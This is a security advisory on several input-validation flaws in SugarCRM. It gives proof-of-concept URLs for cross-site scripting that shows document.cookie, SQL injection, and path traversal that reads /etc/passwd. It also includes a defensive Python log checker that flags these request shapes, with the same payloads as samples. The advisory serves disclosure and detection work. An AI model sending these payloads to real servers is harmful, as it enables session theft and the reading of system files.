SugarCRM Multiple Input Validation Vulnerabilities

An exploit is not required.

The following proof of concept examples are available:
/index.php?action=UnifiedSearch&module=Home&search_form=false&query_string=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/index.php?module=Accounts&action=ListView&query=true&name=[XSS]

/index.php?action=index&module=Home&mod_strings[LNK_NEW_CONTACT]=%3Cscript%3Ealert(document.cookie)%3C/script%3E

/modules/Users/Error.php?app_strings[NTC_CLICK_BACK]=%3Cscript%3Ealert(document.cookie)%3C/script%3E

index.php?action=DetailView&module=Accounts&record=[SQL]

/index.php?module=Opportunities&action=../../../../../../../../etc/passwd%00&advanced=true
/index.php?action=DetailView&module=../../../../../etc/passwd%00
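
A log-review check for the request shapes listed above, as an added example (not code from this advisory or from SugarCRM). It flags `module`/`action` values that are not plain names, `mod_strings[...]`/`app_strings[...]` supplied in the URL, non-identifier `record` values, and markup in any parameter. The `classify` function, the finding labels and the rule that record ids contain only letters, digits and hyphens are assumptions of this example; the sample lines are constructed from the requests above plus one benign request.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters that the requests above use to select code to run.
ROUTING_PARAMS = {"module", "action"}
SAFE_NAME = re.compile(r"[A-Za-z0-9_]+")
# Language-string arrays that should never arrive as request parameters.
STRING_TABLE = re.compile(r"(mod_strings|app_strings)\[")
# Assumption: record ids contain only letters, digits and hyphens.
RECORD_ID = re.compile(r"[A-Za-z0-9-]+")
MARKUP = re.compile(r"[<>]")

def classify(request_target):
    """Return sorted finding labels for one request target (path?query)."""
    findings = set()
    query = urlsplit(request_target).query
    # parse_qsl percent-decodes names and values, so %00 and %3C are seen decoded.
    for name, value in parse_qsl(query):
        if name in ROUTING_PARAMS and not SAFE_NAME.fullmatch(value):
            findings.add("unsafe-" + name)
        if STRING_TABLE.match(name):
            findings.add("string-table-override")
        if name == "record" and not RECORD_ID.fullmatch(value):
            findings.add("record-not-id")
        if MARKUP.search(value):
            findings.add("markup-in-parameter")
    return sorted(findings)

# Constructed sample request targets (first one is benign).
SAMPLES = [
    "/index.php?module=Accounts&action=ListView&query=true&name=Acme",
    "/index.php?action=UnifiedSearch&module=Home&search_form=false"
    "&query_string=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E",
    "/index.php?action=index&module=Home&mod_strings[LNK_NEW_CONTACT]="
    "%3Cscript%3Ealert(document.cookie)%3C/script%3E",
    "/index.php?action=DetailView&module=../../../../../etc/passwd%00",
    "/index.php?action=DetailView&module=Accounts&record=1%27",
]

if __name__ == "__main__":
    for target in SAMPLES:
        print(classify(target) or ["clean"], target)
```

The same allow-list rules (plain names for `module` and `action`, no request-supplied string tables) apply equally as server-side input validation, not only as a log filter.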


 

Copyright 2010, SecurityFocus